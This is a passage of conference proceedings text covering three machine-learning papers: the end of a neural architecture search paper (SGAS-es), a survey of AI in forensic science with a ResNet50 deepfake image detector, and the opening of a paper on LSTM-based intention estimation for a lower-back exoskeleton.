In summary, we proposed SGAS-es, Sequential Greedy Architecture Search with the Early Stopping Indicator, to solve the instability issue and improve the searching ability of SGAS. With SGAS-es, we achieved state-of-the-art results on NAS-Bench-201: mean test accuracy equal to 94.20%, 73.27%, and 46.19% on CIFAR-10, CIFAR-100, and ImageNet-16-120. These scores are better than all other DARTS-based methods reported on NAS-Bench-201 and close to the optimal results. Besides, these results are stable: variances equal to 0.02, 0.03, and 0.04. On more complex DARTS CNN Search Space, we showed that SGAS-es also works. On Fashion-MNIST, the best-searched architecture of SGAS-es reached superior test accuracy: 96.45%. The mean accuracy, 96.37%, is also better than other DARTS-based methods. Besides, the standard deviation, 0.07, indicates that SGAS-es is a stable method. To show the transferability of searched architectures of SGAS-es, we retrained them on EMNIST-Balanced. We achieved 91.36% test accuracy, which is a state-of-the-art result. With these experiments, we can confirm that SGAS-es is a robust method and can derive the architecture with good performance.
Appendix A: FashionMNIST Experiment Settings In the searching stage, we use half of the images in the train set as training images and the other half as validation images. Some data augmentation tricks are listed as follows: for training images, we first do a random crop (RandomCrop()) with a height and a width of 32 and a padding of 4. Second, we do a random horizontal flip (RandomHorizontalFlip()). Third, we transform the format of inputs into tensors and normalize the values of images between 0 and 1 (ToTensor()). Last, we further normalize (Normalize()) these image values with the mean and the standard deviation of Fashion-MNIST training images. For validation images, we do the last two steps (ToTensor() and Normalize()) of what we have done to the training images.
152
S.-P. Lin and S.-D. Wang
Hyperparameter settings of the searching stage are as follows: a batch size is 32 (128 for PC-DARTS since only 14 channels will do the mixed operation). A batch increase is 8. An SGD optimizer is used for network weights with an initial learning rate of 0.025, a minimum learning rate of 0.001, a momentum of 0.9, and a weight decay of 0.0003. A cosine annealing scheduler is used for a learning rate decay. An Adam optimizer is used for architecture parameters with a learning rate of 0.0003, a weight decay of 0.001, and beta values of 0.5 and 0.999. Besides, a gradient clipping is used with a max norm of 5. For supernet, the number of initial channels is 16, and the number of cells is 8. For SGAS-es, we set df , w, k, and T equal to 15, 3, 5, and 1.3. For other DARTS-based methods, a search epoch is set to 50. We use the whole train set to train the supernet for 600 epochs in the retraining stage. Data augmentation tricks used for the train set and the test set are the same as those for the train set and the validation set in the searching stage. However, we add two more tricks for the train set: a cutout with a length of 16 and a random erase. Hyperparameter settings of the retraining stage are as follows: a batch size is 72. An SGD optimizer has an initial learning rate of 0.025, a momentum of 0.9, and a weight decay of 0.0003. Not only the weight decay but also a drop path is used for regularization with a drop path probability of 0.2. The cosine annealing scheduler is also used for learning rate decay. The initial channel size is 36, and the number of cells is 20. An Auxiliary loss is used with an auxiliary weight of 0.4. Other DARTS-based methods (like SGAS and PC-DARTS) and original DARTS in Table 2 follow the same settings. They used similar settings in their papers too.
Appendix B: EMNIST-Balanced Experiment Settings Most experiment settings are the same as those of the retraining stage of FashionMNIST. Some differences are as follows: we use the whole train set to train the supernet for 200 epochs. The batch size of the SGD optimizer is 96. For each training image, we will first resize (Resize()) it to 32 × 32. Second, we will do a random affine (RandomAffine()) with a degree of (–30, 30), a translate of (0.1, 0.1), a scale of (0.8, 1.2), and a shear of (–30, 30). Third, we will transform the format of inputs into tensors and normalize the values of images between 0 and 1 (ToTensor()). Last, we will further normalize (Normalize()) inputs with mean and variance equal to 0.5. For each test image, we will only do ToTensor() and Normalize().
SGAS-es
153
References 1. Liu, H., Simonyan, K., Yang, Y.: ’Darts: differentiable architecture search. arXiv preprint arXiv:1806.09055 (2018) 2. Yang, A., Esperan¸ca, P.M., Carlucci, F.M.: NAS evaluation is frustratingly hard. arXiv preprint arXiv:1912.12522 (2019) 3. Zela, A., Elsken, T., Saikia, T., Marrakchi, Y., Brox, T., Hutter, F.: Understanding and robustifying differentiable architecture search. In: International Conference on Learning Representations (2020). https://openreview.net/forum? id=H1gDNyrKDS 4. Xie, L., et al.: Weight-sharing neural architecture search: a battle to shrink the optimization gap. ACM Comput. Surv. (2022) 5. Chen, X., Xie, L., Wu, J., Tian, Q.: Progressive differentiable architecture search: bridging the depth gap between search and evaluation. In: Proceedings of the IEEE International Conference on Computer Vision, pp. 1294–1303 (2019) 6. Liang, H., et al.: Darts+: improved differentiable architecture search with early stopping, arXiv preprint arXiv:1909.06035 (2019) 7. Chen, X., Hsieh, C.-J.: Stabilizing differentiable architecture search via perturbation-based regularization. In: International Conference on Machine Learning, PMLR (2020) 8. Xu, Y., et al.: PC-DARTS: partial channel connections for memory-efficient architecture search. In: International Conference on Learning Representations (2020). https://openreview.net/forum?id=BJlS634tPr 9. Dong, X., Yang, Y.: Nas-bench-201: extending the scope of reproducible neural architecture search. arXiv preprint arXiv:2001.00326 (2020) 10. Li, G., Qian, G., Delgadillo, I.C., M¨ uller, M., Thabet, A., Ghanem, B.: Sgas: sequential greedy architecture search. In: Proceedings of IEEE Conference on Computer Vision and Pattern Recognition (CVPR) (2020) 11. Keskar, N.S., Mudigere, D., Nocedal, J., Smelyanskiy, M., Tang, P.T.P.: On largebatch training for deep learning: Generalization gap and sharp minima. arXiv preprint arXiv:1609.04836 (2016) 12. Elsken, T., Metzen, J.H., Hutter, F.: Neural architecture search: a survey. J. Mach. Learn. Res. 20(1), 1997–2017 (2019) 13. Chu, X., Zhou, T., Zhang, B., Li, J.: Fair DARTS: eliminating unfair advantages in differentiable architecture search. In: 16th Europoean Conference On Computer Vision (2020). https://arxiv.org/abs/1911.12126.pdf 14. Finn, C., Abbeel, P., Levine, S.: Model-agnostic meta-learning for fast adaptation of deep networks. In: International conference on machine learning, PMLR (2017) 15. Dong, X., Liu, L., Musial, K., Gabrys, B.: NATS-bench: benchmarking NAS algorithms for architecture topology and size. IEEE Trans. Pattern Anal. Mach. Intell. (TPAMI) 44(7), 3634–3646 (2021) 16. Chrabaszcz, P., Loshchilov, I., Hutter, F.: A downsampled variant of imagenet as an alternative to the cifar datasets. arXiv preprint arXiv:1707.08819 (2017) 17. Xiao, H., Rasul, K., Vollgraf, R.: ’Fashion-mnist: a novel image dataset for benchmarking machine learning algorithms. arXiv preprint arXiv:1708.07747 (2017) 18. LeCun, Y.: The MNIST database of handwritten digits. http://yann.lecun.com/ exdb/mnist/ (1998) 19. Guilin, L., Xing, Z., Zitong, W., Zhenguo, L., Tong, Z.: Stacnas: towards stable and consistent optimization for differentiable neural architecture search (2019)
154
S.-P. Lin and S.-D. Wang
20. Mao, Y., Zhong, G., Wang, Y., Deng, Z.: Differentiable light-weight architecture search. In: 2021 IEEE International Conference on Multimedia and Expo (ICME), pp. 1–6. IEEE (2021) 21. Zhong, Z., et al.: ’Random erasing data augmentation. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 34. no. 07 (2020) 22. Rajasegaran, J., Jayasundara, V., Jayasekara, S., Jayasekara, H., Seneviratne, S., Rodrigo, R.: Deepcaps: going deeper with capsule networks. In: Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 10 725–10 733 (2019) 23. Nøkland, A., Eidnes, L.H.: Training neural networks with local error signals. In: International Conference on Machine Learning, pp. 4839–4850. PMLR (2019) 24. Cohen, G., Afshar, S., Tapson, J., Van Schaik, A.: Emnist: extending mnist to handwritten letters. In: 2017 International Joint Conference on Neural Networks (IJCNN), pp. 2921–2926. IEEE (2017) 25. Jeevan, P., Sethi, A.: WaveMix: resource-efficient token mixing for images. arXiv preprint arXiv:2203.03689 (2022) 26. Kabir, H., et al.: Spinalnet: deep neural network with gradual input. arXiv preprint arXiv:2007.03347 (2020) 27. Jayasundara, V., Jayasekara, S., Jayasekara, H., Rajasegaran, J., Seneviratne, S., Rodrigo, R.: Textcaps: handwritten character recognition with very small datasets. In: 2019 IEEE Winter Conference on Applications of Computer Vision (WACV), pp. 254–262. IEEE (2019)
Artificial Intelligence in Forensic Science Nazneen Mansoor1 and Alexander Iliev1,2(B) 1 SRH University of Applied Sciences, Berlin, Germany
[email protected] 2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, Sofia, Bulgaria
Abstract. Artificial intelligence is a rapidly evolving technology that is being used in a variety of industries. This report provides an overview of some artificial intelligence applications used in forensic science. It also describes recent research in various fields of forensics, and we implemented a model for a use case in digital forensics. Keywords: Forensics · CNN · Transfer learning · Deep learning · ResNet50 · Deepfake detection · AI
1 Introduction Forensic science is the study of evidence or the use of scientific methods to investigate crimes. Forensic investigation involves extensive research that includes gathering evidence from various sources and combining it to reach logical conclusions. Data extraction from mysterious sources can be productive and compulsive, but dealing with massive amounts of data can be quite confusing. There has been a wide range of areas from which data has been produced, particularly in the case of forensics, from DNA and fingerprint analysis to anthropology. With the expanding growth of Artificial intelligence (AI) in all industries, scientists have done various pieces of research to understand how forensic science could benefit from the technologies in the field of AI. Artificial intelligence plays a significant role in forensics because it allows forensic investigators to automate their strategies and identify insights and information. The use of artificial intelligence technology improves the chances of detecting and investigating crimes. Artificial intelligence could assist forensic experts in effectively handling data and providing a systematic approach at various levels of the investigation. This could save forensic researchers a significant amount of time, giving them more time to work on other projects. AI can discover new things by integrating all of the unstructured data collected by investigators. Unlike traditional forensic identification, the use cases of Artificial intelligence are numerous in the field of forensic science. This report describes a list of Artificial intelligence applications which are used in forensic science, some of the recent studies conducted in this field, and the implementation of the model for an AI use case in digital forensics.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 155–163, 2023. https://doi.org/10.1007/978-3-031-28073-3_11
156
N. Mansoor and A. Iliev
2 Related Works The drowning diagnosis in forensics is one of the most challenging tasks as the findings from the post-mortem image diagnosis is uncertain. Various studies have been focused on this area of research to address this issue. The researchers in [1, 2] have used a deep learning approach to classify the subjects into drowning or non-drowning cases by using post-mortem lung CT images. In [1], they used a computer-aided diagnosis (CAD) system which consists of a deep CNN (DCNN) model. DCNN is trained using a transfer learning technique based on AlexNet architecture. For the experiment, they used CT images of post-mortem lungs of around 280 cases in total which included 140 non-drowning cases (3863 images) and 140 drowning cases (3784 images) [1]. They could achieve better results in detecting drowning cases. In [2], the authors used the same dataset as in [1] and used a different deep learning approach based on the VGG16 transfer learning model. VGG16 model [2] showed better performance compared to AlexNet used in [1] for drowning detection. The automatic age estimation of human remains or living individuals is a vital research field in forensics. Age estimation using dental X-ray images [3] or MRI data [4] is commonly used in forensic identification, but the conventional methods do not yield good results. To enhance the performance, the researchers in [3] implemented a deep learning technique to evaluate the age from teeth X-ray images. They have used a dental dataset that consists of 27,957 labeled orthopantomogram subjects (16,383 for females and 11,574 for males). The accuracy of the age prediction of these subjects is verified using their ID card details. The authors have focused on different neural network elements that are useful for age estimation. This paper is relevant in forensic science for estimating age from panoramic radiograph images. In [4], the researchers proposed an automatic age estimation from multi-factorial MRI data of clavicles, hands, and teeth. The authors in [4] used a deep CNN model to predict age and the dataset consists of 322 subjects with the age range between 13 and 25 years. Gender estimation is another significant aspect of forensic identification, particularly in mass disaster situations. In [5], the authors proposed a model to estimate the accuracy of gender prediction from Cone Beam Computed Tomography (CBCT) scans. They used linear measurements of the maxillary sinus from CBCT scans and principal component analysis (PCA) was done to lower the dimensionality. With the development in the field of Artificial intelligence, face recognition is a significant research topic that can be beneficial in digital forensics. The researchers in [6] have implemented a deep learning system that can analyze image and video files retrieved from forensic evidence. The proposed model in [6] could detect faces or objects from the given images or videos. The model is trained using YOLOv5 algorithms which is a novel convolutional neural network (CNN) that can be used to detect faces or objects for real-time applications. From their study, it’s proven that algorithms trained using deep learning techniques are highly preferred and useful for forensic investigations. Most of the data extracted from digital forensics contain unstructured data like photos, text, and videos. Data extracted from text play a significant role in digital forensics. Natural language processing (NLP) is an interesting research topic in the field of AI which can be used to provide relevant information in forensics too. In [7], the researchers developed a pipeline to retrieve information from texts using NLP and built models like
Artificial Intelligence in Forensic Science
157
named entity recognition (NER), and relation extraction (RE) in any language. From their experimental results, it’s proven that this solution enhances the performance of digital investigation applications. In [8] and [9], the researchers used CNN models to identify the Deepfake media in digital forensics.
3 Applications of AI in Forensic Science Artificial intelligence assists forensic scientists by providing proper judgment and techniques to have better results in various areas. It involves forensic anthropology by finding out the skeletal age or sex, dealing with a large amount of forensic data, associating specific components from the images, or discovering similarities in place, communication, and time. Some of the AI use cases in the field of forensic science are listed below. 3.1 Pattern Recognition Pattern recognition is one of the main applications of AI in forensic science which deals with identifying certain types of patterns within a massive amount of data [11]. It can include any pattern recognition such as images of a person, or place, forming sequences from a text like an email, or messages, and other audio patterns from sound files [8, 11]. This pattern matching is based on solid evidence, statistics, and probabilistic thinking. AI helps in providing better ideas for identifying the trends with complex data accurately and efficiently. It also helps the detectives to find the suspect by providing information about past criminal records. The methodology which was used for face image pattern recognition is shown in Fig. 1. 3.2 Data Analysis Digital forensics is a developing field that requires complex and large dataset computation and analysis [11]. In digital forensics, scientists manage to collect digital shreds of evidence from various networks or computers [13]. These pieces of evidence are useful in various areas of investigation. Artificial intelligence acts as an efficient tool in dealing with these large datasets [13]. With the help of AI, a meta-analysis of the data extracted from different sources can be conducted. This meta-data can be transformed into an understandable and simplified format within a short time [11]. 3.3 Knowledge Discovery Knowledge discovery and data mining are the other areas in which artificial intelligence is used. Knowledge discovery is the technique of deriving useful information and insights from data. Data mining includes AI, probabilistic methods, and statistical analysis, which can gather and analyze large data samples. Forensic scientists could use AI to investigate various crimes using this approach to discover patterns.
158
N. Mansoor and A. Iliev
Fig. 1. Methodology for forensic face sketch recognition [16]
3.4 Statistical Evidence In forensic science, strong statistical evidence is required to support the arguments and narration [12]. AI helps in building graphical models that can be used to support or disprove certain arguments, thereby making better decisions. There are various computational and mathematical tools in AI that helps to build significant and statistically relevant evidence. 3.5 Providing Legal Solutions The scientific methods provided by forensic statistics support the legal system with the necessary evidence [12]. With more comprehensive and sophisticated information databases, artificial intelligence aids the legal community with better solutions. 3.6 Creating Repositories With the increasing demand in the case of storage capacity, forensic investigators find it difficult to store and analyze data related to forensic science [12]. The storage issues can be rectified by building online repositories using AI. These repositories are useful to store digital forensic data, properties, investigations, and results [13]. 3.7 Enhance Communication Between Forensic Team Members In a forensic investigation, it’s necessary to maintain strong communication between forensic statisticians, criminal investigators, lawyers, and others [12]. Miscommunication between these teams could result in misinterpretation of data which leads to wrong decisions or unfair justice. Artificial intelligence assists to bridge the communication gap between various teams in the forensic field.
Artificial Intelligence in Forensic Science
159
4 Proposed Methodology We have tried to implement a system to detect Deepfake images which can be widely used in digital forensics. With the advancement of technology and the ease of creating fake content, media manipulation has become widespread in recent years [10]. These fake media contents are generated using advanced AI technologies like deep learning algorithms and hence they are known as “Deepfakes” [15]. Therefore, it has become difficult to differentiate the original media from the fake ones with our naked eye. There are numerous Deepfake videos or images which are circulated across social media and these manipulated videos or images can be a threat to society and could lead to an increase in the number of cybercrimes. With the increasing number of Deepfake content, there is a high demand for developing a system that could detect Deepfake videos or images. Artificial intelligence contributes efficiently to detecting these manipulated multimedia content [15]. The proposed system uses a neural network with a transfer learning technique that is based on ResNet50 architecture to train our model. 4.1 Data Collection and Pre-processing The dataset selected to train the model is the Celeb-DF dataset. It includes 590 celebrity videos and 300 additional videos that are downloaded from YouTube. Also, it contains 5639 synthesized videos generated from celeb real videos. The videos are converted into frames using the cv2 python library. From the frames, faces are cropped and in total, there were 19,457 images. For training the model, we have used 80% of the data which is around 15565 images, 10% for validation, and 10% for testing purposes.
Fig. 2. Fake images [14]
Fig. 3. Real images [14]
Figure 2 and Fig. 3 denote an example of a few of the fake and real images which are part of our dataset. Pre-processing of the images is done using the Image data generator class of Keras applications.
160
N. Mansoor and A. Iliev
4.2 Training the Model The model is developed using ResNet50 architecture from the Python Keras application and there are two additional dense layers used in our model with a dropout of 50%. For activation functions, rectified linear unit (ReLU) is used in the hidden layer and the sigmoid function is used in the output layer. The number of epochs for training the models is set to 60 respectively. For compiling the models, we have opted for Stochastic Gradient Descent (SGD) optimizer with a momentum of 0.9 and a learning rate of 0.001 and used binary cross-entropy as the loss function.
5 Results Accuracy is the performance metric that is used to evaluate the efficiency of our model. There are two graphs attained that show the accuracy and loss during training the model. Figure 4 illustrates the training and validation curves with the accuracy and loss of the trained model. The confusion matrix of the model is depicted in Fig. 5 which shows the actual and predicted number of fake and real images. From the confusion matrix, the test accuracy is evaluated as 92%. In Fig. 6, the example of a predicted class of an image using the model is depicted.
Fig. 4. Training and validation learning curves (accuracy and loss)
Artificial Intelligence in Forensic Science
161
Fig. 5. Confusion matrix of the model
Fig. 6. Example of apredicted image
6 Conclusion Artificial intelligence is rapidly becoming the most important applied science in all fields. This report summarizes a few of the various AI applications in forensics, and it could be concluded that AI can help forensic experts or investigators reduce the time taken on various tasks and thereby improving their performance. Some of the AI applications that are prevalent in the field of forensic science are pattern recognition, handling large amounts of data, and providing legal solutions. Researchers have made various studies to understand how forensic science benefits from AI technologies for different use cases such as drowning diagnosis from images, age, and gender estimation. As part of our study,
162
N. Mansoor and A. Iliev
we have tried to implement a neural network model based on ResNet50 architecture to detect Deepfake images and it could be useful in digital forensics. The proposed model can differentiate real and fake images with an accuracy rate of around 92%.
References 1. Homma, N., et al.: A Deep learning aided drowning diagnosis for forensic investigations using post-mortem lung CT images. In: 2020 42nd Annual International Conference of the IEEE Engineering in Medicine & Biology Society (EMBC), pp. 1262–1265 (2020). https:// doi.org/10.1109/EMBC44109.2020.9175731 2. Qureshi, A.H., et al.: Deep CNN-based computer-aided diagnosis for drowning detection using post-mortem lungs CT images. In: 2021 IEEE International Conference on Bioinformatics and Biomedicine (BIBM), pp. 2309–2313 (2021). https://doi.org/10.1109/BIBM52 615.2021.9669644 3. Hou, W., et al.: Exploring effective DNN models for forensic age estimation based on panoramic radiograph images. In: 2021 International Joint Conference on Neural Networks (IJCNN), pp. 1–8 (2021). https://doi.org/10.1109/IJCNN52387.2021.9533672 4. Štern, D., Payer, C., Giuliani, N., Urschler, M.: Automatic age estimation and majority age classification from multi-factorial MRI data. IEEE J. Biomed. Health Inform. 23(4), 1392– 1403 (2019). https://doi.org/10.1109/JBHI.2018.2869606 5. Al-Amodi, A., Kamel, I., Al-Rawi, N.H., Uthman, A., Shetty, S.: Accuracy of linear measurements of maxillary sinus dimensions in gender identification using machine learning. In: 2021 14th International Conference on Developments in eSystems Engineering (DeSE), pp. 407–412 (2021). https://doi.org/10.1109/DeSE54285.2021.9719421 6. Karaku¸s, S., Kaya, M., Tuncer, S.A., Bah¸si, M.T., Açiko˘glu, M.: A deep learning based fast face detection and recognition algorithm for forensic analysis. In: 2022 10th International Symposium on Digital Forensics and Security (ISDFS), pp. 1–6 (2022). https://doi.org/10. 1109/ISDFS55398.2022.9800785 7. Rodrigues, F.B., Giozza, W.F., de Oliveira Albuquerque, R., García Villalba, l.J.: Natural language processing applied to forensics information extraction with transformers and graph visualization. In: IEEE Trans. Comput. Soc. Syst. https://doi.org/10.1109/TCSS.2022.315 9677 8. Jadhav, E., Sankhla, M.S., Kumar, R.: Artificial intelligence: advancing automation in forensic science & criminal investigation. Seybold Rep. 15, 2064–2075 (2020) 9. Vamsi, V.V.V.N.S., et al.: Deepfake detection in digital media forensics. Glob. Trans. Proc. 3(1), 74–79 (2022). ISSN 2666–285X, https://doi.org/10.1016/j.gltp.2022.04.017 10. Jafar, M.T., Ababneh, M., Al-Zoube, M., Elhassan, A.: Forensics and analysis of deepfake videos. In: 2020 11th International Conference on Information and Communication Systems (ICICS), pp. 053–058 (2020). https://doi.org/10.1109/ICICS49469.2020.239493 11. NEWS MEDICAL LIFE SCIENCES, AI in Forensic Science. https://www.news-medical. net/life-sciences/AI-in-Forensic-Science.aspx. Accessed 30 June 2022 12. Mohsin, K.: Artificial intelligence in forensic science. SSRN Electron. J. (2021). https://doi. org/10.2139/ssrn.3910244 13. Gupta, S.: Artificial intelligence in forensic science. IRJET (2020). e-ISSN: 2395–0056 14. @inproceedings{Celeb_DF_cvpr20, author = {Yuezun Li, Xin Yang, Pu Sun, Honggang Qi and Siwei Lyu}, title = {Celeb-DF: A Large-scale Challenging Dataset for DeepFake Forensics}, booktitle= {IEEE Conference on Computer Vision and Patten Recognition (CVPR)}, year = {2020} } - celeb df. Accessed 05 July 2022
Artificial Intelligence in Forensic Science
163
15. Karandikar, A.: Deepfake video detection using convolutional neural network. Int. J. Adv. Trends Comput. Sci. Eng. 9, 1311–1315 (2020). https://doi.org/10.30534/ijatcse/2020/629 22020 16. @inproceedings{Srivastava2013ForensicFS, title={Forensic Face Sketch Recognition Using Computer Vision}, author={Vineet K. Srivastava}, year={2013}
Deep Learning Based Approach for Human Intention Estimation in Lower-Back Exoskeleton Valeriya Zanina(B) , Gcinizwe Dlamini, and Vadim Palyonov Innopolis University, Innopolis, Russia {v.zanina,g.dlamini}@innopolis.university, [email protected]
Abstract. Reducing spinal loads using exoskeletons has become one of the optimal solution in reducing compression of the lumbar spine. Medical research has proved that the reduction compression of the lumbar spine is a key risk factor for musculoskeletal injuries. In this paper we present a deep learning based approach which is aimed at increasing the universality of lower back support for the exoskeletons with automatic control strategy. Our approach is aimed at solving the problem of recognizing human intentions in a lower-back exoskeleton using deep learning. To train and evaluate our approach deep learning model, we collected dataset using from wearable sensors, such as IMU. Our deep learning model is a Long shortterm memory neural network which forecasts next values of 6 angles. The mean squared error and coefficient of determination are used for evaluation of the model. Using mean squared error and coefficient of determination we evaluated our model on dataset comprised of 700 samples and achieved performance of 0.3 and 0.99 for MSE and R2 , respectively. Keywords: Deep learning
1
· Robots · Exoskeleton · Human intention
Introduction
A person whose activity related to body strain for long periods of time is subject to an increased risk of backache. In order to provide back support and help to minimize the load from the lower back, wearable robotic devices for the spine were developed, which lower the peak torque requirements around the lumbosacral (L5/S1) joint [11]. Manual work is still present in many industrial environments, and these devices can help to reduce the number of injuries in lifting tasks with heavy loads. The lower-back exoskeletons are created to support, increase the power of the human body or to reduce the load on the muscles when the motion is limited. However, in the modern world, the requirements for exoskeletons are constantly increasing. Devices should not interfere [14,15] with other tasks which are not related to lifting. Passive exoskeletons cannot address this challenge, but active ones can, because they are supplemented by actuators (electric motors, hydraulic actuators, etc.). With active exoskeletons it is important that the assistance c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 164–182, 2023. https://doi.org/10.1007/978-3-031-28073-3_12
DL Human Intention Estimation in Lower-Back Exoskeleton
165
motion is generated based on the user’s motion intention. Depending on the phase of body movements, the system has to understand when it is time to activate the motors. Thus, the control strategy of exoskeleton is currently a increasing area of research. Solutions for predicting movement types during different activities could be based on models using an optimal control approach. In order to adapt an active exoskeleton to a person’s back movements, special methodology which is based on mechanisms with backbone-based kinematics can be adopted [19]. Human activity can be rigid, set by a user output [23] or it can use an algorithm for human activity recognition. There are several approaches to solve human intention estimation proposed over the years, however research on how to predict movements and the load applied to human body is limited. Our work focuses on prediction the human intentions during lifting tasks through deep learning approach. To assess human intentions, a suit based on inertial modules was created, data was collected and preprocessed, features were selected and extracted and the recurrent neural network with LSTM units was constructed. The rest of the paper is structured as follows: Sect. 2 presents background and related work. Section 3 presents our proposed methodology and pipeline. Section 4 provides the details about our approach implementation and experiments. Section 5 presents the obtained results followed by discussion. Conclusion and future research directions are outlined in Sect. 6.
2
Related Work
Many cases for adaptive control solutions still needs to know human intention and as part of it recognize the modeling of human behavior. Thus over the years there has been a growing research interest in prediction of human behavior to help simplify the design process of exoskeletons and other wearable robotics. In addition to human intention evaluation and recognition algorithms themselves, there is also a difficult task of collecting the evaluation data themselves, because the model requires input data for training. Depending on the type of data generated, methods for recognizing human intentions can be divided into two main groups: sensor-based and vision-based ones. This section provides an overview of these two types and what other researchers have accomplished over the past years. 2.1
Vision-Based Methods
For the artificial data generation, also based on video. For example, Hyeokhyen et al. [8] suggested using the video from large-scale repositories and automatically generated data for virtual sensor IMUs that can be used in real-world settings. This approach involves a number of techniques from computer vision, signal processing, and machine learning. The limitations of the research proposed by Hyeokhyen et al. [8] is that it works only with primitive activities in 2D space
166
V. Zanina et al.
Data based on motion capture technology is actively used and studied in other works [12,21] on the topic of predicting human intentions. The largest and most complete is the Human3.6M dataset [5] but in our case this approach as the well as other methods based on data from videos and pictures will not be effective. In conditions of hard work, usually in factories, it will be expensive to have a video surveillance system only for prediction. Moreover, cameras have blind spots and any object can interfere with reliably determining the human intention. Despite this, computer vision-based systems for activity data collection in 3D space are also effective. In the research conducted by Yadav et al. [26], human body frames are acquired from Kinect-v2 sensor, which is a depth sensor-based motion-sensing input device. Kinect-v2 sensor offers a convenient way to record and capture activity of human skeleton joints, and tracks the 3D skeleton joint coordinates. In the research conducted by Yadav et al. [26] the 3D coordinates are used to make a 3D bounding box over the tracked human suitable features, extracted for identifying different activities. The final dataset which contains a total of 130,000 samples with 81 attribute values is inputted to deep learning networks activity recognition. CNN-LSTM combination called ConvLSTM network was used. Sumaira Ghazal in [4] used only 2D-skeletal data from a camera. To recognize the activity, the main features were extracted using the positions of human skeletal joints from the video due to the OpenPose system. This library extracts the locations of skeletal joints for all the persons in an image or a video frame. A 3D array with information about the persons number is the output of the OpenPose. In light of the aforementioned studies, in this paper exoskeleton of the lowerback is used together with a deep learning recurrent neural network to predict human intention and minimize the spine load when performing heavy tasks such as in factories 2.2
Data from Wearable Sensors
These group contains algorithms based on sensory data obtained from inertial sensors, such as accelerometers or gyroscopes on certain body parts or from mobile phones [25]. The main motivation to use a smartphone as a wearable sensor is due to the fact that the devices are portable and have great computing power, as well as have an open system for integration applications that read data from internal sensors, as well as the relative cheapness of the device [22]. Wang et al. [24] presented a study focused in gait recognition of exoskeleton robots based on the DTW algorithm. The researchers [24] used plantar pressure sensors and joint angle sensors to collect gait data. The pressure sensor was used to measure the pressure on the soles and roots of the feet, and the angle sensor was used to measure the angle of the hip and knee joints. The obtained gait data have to be prepossessed to avoid noise, so the researchers [24] applied S-G filter to smooth this information. Finally, the researchers [24] used DTW algorithm for gait recognition which is a simple and easy algorithm that requires limited
DL Human Intention Estimation in Lower-Back Exoskeleton
167
hardware. However, the problem with standard approach is that the training method cannot effectively use statistical methods and the amount of calculation is relatively large. That is why the authors improved it, which resulted in certain enhancement in recognition rate and real-time performance and proved that humans and machines can be controlled in a coordinated manner. Roman Chereshnev [2] made a huge contribution to the creation of data in the field of analysis and activity recognition as a result of the scientific work on the creation of a human gait control system using machine learning methods. Chereshnev [2] in his work collected data from a body sensor network consisting of six wearable inertial sensors (accelerometers and gyroscopes) located on right and left thighs, shins, and feet. In addition, two electromyography sensors were used on the quadriceps to measure muscle activity. 38 signals overall were collected from the inertial sensors and 2 from the EMG sensors. The main activities in Chereshnev’s work [2] was walking and turning at various speeds on a flat surface, running at various paces, taking stairs up and down, standing, sitting, sitting in a car, standing up from a chair and cycling. The results data named HuGaDB is publicly available for the research community. However, there is still no information for the lifting task in the dataset. There were other works that used HuGaDB for activity recognition [1]. For example, in the work [3] HuGaDB was used for evaluation of gait neural network performance as well as on data collected by an inertial-based wearable motion capture device. Thus, the entire motion acquisition system consisted of seven inertial measurement units, but only the signals from the lower limbs were selected for the human gait prediction [3]. For the basic model two temporal convolution networks were used. One temporal convolutional network (TCN) to process the original input, then the combination of the original input and the output of the first TCN are combined into the input to the second TCN and in the end, a recognition model and a prediction model are added to the network as two fully connected layers. The resulting model is used to predict the accelerations and angular velocities. Sensor-based collection is well studied area, but all research in this field relate to gait or primitive activities recognition. There is practically no contribution into datasets for lifting tasks. The best method for this task will be to use wearable sensors to collect the data. Since we are more interested in assessing a person’s not only recognition and also intentions, a deep learning method was chosen to predict the subsequent intention in time based on the readings received from the sensors.
3
Methodology
This chapter is a description of an approach for estimation human intentions in the lower-back exoskeleton through wearable sensors and machine learning tools. The pipeline is presented in Fig. 1. No exoskeleton was involved in the data collection process because an exoskeleton-independent algorithm is planned. This section describes the methodology and development of a suit based on inertial modules. The costume is designed to collect data which will be suitable
168
V. Zanina et al.
for training and testing different algorithms for estimation of human intention. This chapter also provides a description of the collected dataset itself, as well as the implementation of human intention recognition in lifting tasks to create an inference system that is appropriate controlling torque in lower back exoskeleton using deep-learning.
Fig. 1. Our proposed approach pipeline
3.1
Data Acquisition via Sensors
An active back exoskeleton should help a person to lift a heavy load. To do this, it needs to know what the movement will be in the next moment and, depending on this, decide torques of which magnitude should be applied to the motors. Based on a literature review, we see that the task of recognizing activities is widely used with wearable sensors, but the proposed methods are relevant mainly for gait recognition. The most popular sensor is a Electromyography (EMG) sensor which can accurately indicate movement, but this approach is not applicable, since the sensors are attached to the human body. During the lifting task, a person may get tired and sweaty, which is why the sensors can make noise and give out data with a bad- quality. There are several motion capture suits on the world market. For example in [16] XSens costume is used. However, such systems are usually redundant with sensors and closed in acced to data for processing it. Existing datasets are not applicable for lifting tasks, foe example is the USC-HAD [27], HuGaDB [2], PAMAP2 [18], MAREA [6] and others. So, it was decided to design a costume for collecting experimental data in order to contribute to datasets for human activity recognition. IMU sensors were selected, which are easy to wear and allow to make the algorithm independent of the design of the lower-back exoskeleton. 3.2
Kinematic Data Analysis
Lifting activity is a state where the initial position is standing up and its turns into a squat-style tilt followed by straightening in which it is necessary to include lower-back exoskeleton in order to compensate for the load on the spine. The arrangement of sensors was due to the anatomical behavior of the human body [11] in space during the lifting task. The angles that were used in the analysis to defines the features is on Fig. 2.
DL Human Intention Estimation in Lower-Back Exoskeleton
169
Fig. 2. Angle definitions for the human by the Matthias B. N¨ af [11], Where Blue Dot is the Lumbosacral Joint, (a) - Knee, (b) - Hip Angle, (c) - Lumbar Angle, (d) - Trunk Angle, (e) - Pelvis Inclination. The Position and Orientation (A) of the Lower Leg, (B) - Upper Leg,(C) - The Pelvis, (D) - The Trunk
Based on the research conducted by [10], the human spine conducts three main motions: flexion and extension in sagittal plane, lateral bending, and axial rotation on Fig. 3).
Fig. 3. The range of movements of the limb
